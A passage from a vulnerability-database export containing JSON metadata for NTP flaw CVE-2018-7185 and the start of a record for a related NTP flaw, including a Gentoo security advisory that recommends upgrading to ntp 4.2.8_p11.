SIGNATURE-----\n\niEYEARECAAYFAlqYjI8ACgkQakRjwEAQIjM5rACfdDAWRxL2nQATj8HFDPgCVInK\n13MAnR04OluKfiEsJVgO6uWJKXy2HOGq\n=FRx7\n-----END PGP SIGNATURE-----\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2018-7185"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-002750"
      },
      {
        "db": "BID",
        "id": "103339"
      },
      {
        "db": "VULHUB",
        "id": "VHN-137217"
      },
      {
        "db": "PACKETSTORM",
        "id": "148455"
      },
      {
        "db": "PACKETSTORM",
        "id": "147917"
      },
      {
        "db": "PACKETSTORM",
        "id": "151287"
      },
      {
        "db": "PACKETSTORM",
        "id": "146631"
      }
    ],
    "trust": 2.34
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2018-7185",
        "trust": 3.2
      },
      {
        "db": "BID",
        "id": "103339",
        "trust": 2.0
      },
      {
        "db": "PACKETSTORM",
        "id": "146631",
        "trust": 1.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-002750",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201803-141",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-137217",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "148455",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "147917",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "151287",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-137217"
      },
      {
        "db": "BID",
        "id": "103339"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-002750"
      },
      {
        "db": "PACKETSTORM",
        "id": "148455"
      },
      {
        "db": "PACKETSTORM",
        "id": "147917"
      },
      {
        "db": "PACKETSTORM",
        "id": "151287"
      },
      {
        "db": "PACKETSTORM",
        "id": "146631"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201803-141"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-7185"
      }
    ]
  },
  "id": "VAR-201803-1822",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-137217"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2025-01-15T21:25:56.922000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "NTP Bug 3454",
        "trust": 0.8,
        "url": "http://support.ntp.org/bin/view/Main/NtpBug3454"
      },
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "http://www.slackware.com/"
      },
      {
        "title": "Synology-SA-18:13",
        "trust": 0.8,
        "url": "https://www.synology.com/support/security/Synology_SA_18_13"
      },
      {
        "title": "NTP protocol Repair measures for engine security vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=78915"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-002750"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201803-141"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "NVD-CWE-noinfo",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-20",
        "trust": 0.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-137217"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-002750"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-7185"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.3,
        "url": "http://www.securityfocus.com/bid/103339"
      },
      {
        "trust": 2.3,
        "url": "http://packetstormsecurity.com/files/146631/slackware-security-advisory-ntp-updates.html"
      },
      {
        "trust": 2.0,
        "url": "http://support.ntp.org/bin/view/main/ntpbug3454"
      },
      {
        "trust": 1.8,
        "url": "https://security.gentoo.org/glsa/201805-12"
      },
      {
        "trust": 1.7,
        "url": "http://www.securityfocus.com/archive/1/541824/100/0/threaded"
      },
      {
        "trust": 1.7,
        "url": "https://security.netapp.com/advisory/ntap-20180626-0001/"
      },
      {
        "trust": 1.7,
        "url": "https://www.synology.com/support/security/synology_sa_18_13"
      },
      {
        "trust": 1.7,
        "url": "https://security.freebsd.org/advisories/freebsd-sa-18:02.ntp.asc"
      },
      {
        "trust": 1.7,
        "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html"
      },
      {
        "trust": 1.7,
        "url": "https://usn.ubuntu.com/3707-1/"
      },
      {
        "trust": 1.7,
        "url": "https://usn.ubuntu.com/3707-2/"
      },
      {
        "trust": 1.6,
        "url": "https://support.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-hpesbux03962en_us"
      },
      {
        "trust": 1.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7185"
      },
      {
        "trust": 0.9,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7185"
      },
      {
        "trust": 0.6,
        "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019verbose-5072833.html"
      },
      {
        "trust": 0.3,
        "url": "http://www.ntp.org/"
      },
      {
        "trust": 0.3,
        "url": "https://www.oracle.com/technetwork/topics/security/bulletinapr2018-4443185.html"
      },
      {
        "trust": 0.3,
        "url": "http://aix.software.ibm.com/aix/efixes/security/ntp_advisory10.asc"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7184"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7182"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7183"
      },
      {
        "trust": 0.2,
        "url": "https://usn.ubuntu.com/usn/usn-3707-1"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7170"
      },
      {
        "trust": 0.1,
        "url": "https://support.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026amp;docid=emr_na-hpesbux03962en_us"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.8p4+dfsg-3ubuntu5.9"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.8p10+dfsg-5ubuntu3.3"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu2.14.04.13"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.8p10+dfsg-5ubuntu7.1"
      },
      {
        "trust": 0.1,
        "url": "https://creativecommons.org/licenses/by-sa/2.5"
      },
      {
        "trust": 0.1,
        "url": "https://security.gentoo.org/"
      },
      {
        "trust": 0.1,
        "url": "https://bugs.gentoo.org."
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/usn/usn-3707-2"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-9310"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-6462"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-9311"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7426"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-6463"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7182"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1549"
      },
      {
        "trust": 0.1,
        "url": "http://slackware.com"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1549"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7184"
      },
      {
        "trust": 0.1,
        "url": "http://osuosl.org)"
      },
      {
        "trust": 0.1,
        "url": "http://slackware.com/gpg-key"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7170"
      },
      {
        "trust": 0.1,
        "url": "http://support.ntp.org/bin/view/main/securitynotice#february_2018_ntp_4_2_8p11_ntp_s"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-137217"
      },
      {
        "db": "BID",
        "id": "103339"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-002750"
      },
      {
        "db": "PACKETSTORM",
        "id": "148455"
      },
      {
        "db": "PACKETSTORM",
        "id": "147917"
      },
      {
        "db": "PACKETSTORM",
        "id": "151287"
      },
      {
        "db": "PACKETSTORM",
        "id": "146631"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201803-141"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-7185"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-137217"
      },
      {
        "db": "BID",
        "id": "103339"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-002750"
      },
      {
        "db": "PACKETSTORM",
        "id": "148455"
      },
      {
        "db": "PACKETSTORM",
        "id": "147917"
      },
      {
        "db": "PACKETSTORM",
        "id": "151287"
      },
      {
        "db": "PACKETSTORM",
        "id": "146631"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201803-141"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-7185"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2018-03-06T00:00:00",
        "db": "VULHUB",
        "id": "VHN-137217"
      },
      {
        "date": "2018-02-27T00:00:00",
        "db": "BID",
        "id": "103339"
      },
      {
        "date": "2018-04-27T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2018-002750"
      },
      {
        "date": "2018-07-09T23:38:43",
        "db": "PACKETSTORM",
        "id": "148455"
      },
      {
        "date": "2018-05-26T22:55:24",
        "db": "PACKETSTORM",
        "id": "147917"
      },
      {
        "date": "2019-01-23T21:28:55",
        "db": "PACKETSTORM",
        "id": "151287"
      },
      {
        "date": "2018-03-01T23:35:00",
        "db": "PACKETSTORM",
        "id": "146631"
      },
      {
        "date": "2018-03-07T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201803-141"
      },
      {
        "date": "2018-03-06T20:29:01.500000",
        "db": "NVD",
        "id": "CVE-2018-7185"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-08-24T00:00:00",
        "db": "VULHUB",
        "id": "VHN-137217"
      },
      {
        "date": "2018-08-15T10:00:00",
        "db": "BID",
        "id": "103339"
      },
      {
        "date": "2018-04-27T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2018-002750"
      },
      {
        "date": "2020-08-25T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201803-141"
      },
      {
        "date": "2025-01-14T19:29:55.853000",
        "db": "NVD",
        "id": "CVE-2018-7185"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "148455"
      },
      {
        "db": "PACKETSTORM",
        "id": "147917"
      },
      {
        "db": "PACKETSTORM",
        "id": "151287"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201803-141"
      }
    ],
    "trust": 0.9
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "ntp Input validation vulnerability",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-002750"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "input validation error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201803-141"
      }
    ],
    "trust": 0.6
  }
}

VAR-201803-1837

Vulnerability from variot - Updated: 2025-01-15 19:50

ntpd in ntp 4.2.x before 4.2.8p7 and 4.3.x before 4.3.92 allows authenticated users that know the private symmetric key to create arbitrarily-many ephemeral associations in order to win the clock selection of ntpd and modify a victim's clock via a Sybil attack. This issue exists because of an incomplete fix for CVE-2016-1549. ntp Contains data processing vulnerabilities and key management errors. NTP is prone to a remote security vulnerability. Successful exploits will allow attackers to bypass certain security restrictions and perform some unauthorized actions to the application. This may aid in further attacks. Versions prior to NTP 4.2.8p7 and 4.3.x versions prior to 4.3.92 are vulnerable. ntpd is one of the operating system daemons. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201805-12

                                       https://security.gentoo.org/

Severity: Normal Title: NTP: Multiple vulnerabilities Date: May 26, 2018 Bugs: #649612 ID: 201805-12

Synopsis

Multiple vulnerabilities have been found in NTP, the worst of which could lead to remote code execution.

Background

NTP contains software for the Network Time Protocol.

Affected packages

-------------------------------------------------------------------
 Package              /     Vulnerable     /            Unaffected
-------------------------------------------------------------------

1 net-misc/ntp < 4.2.8_p11 >= 4.2.8_p11

Description

Multiple vulnerabilities have been discovered in NTP. Please review the CVE identifiers referenced below for details.

Impact

A remote attacker could possibly execute arbitrary code or cause a Denial of Service condition.

Workaround

There is no known workaround at this time.

Resolution

All NTP users should upgrade to the latest version:

# emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/ntp-4.2.8_p11"

References

Availability

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

https://security.gentoo.org/glsa/201805-12

Concerns?

License

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1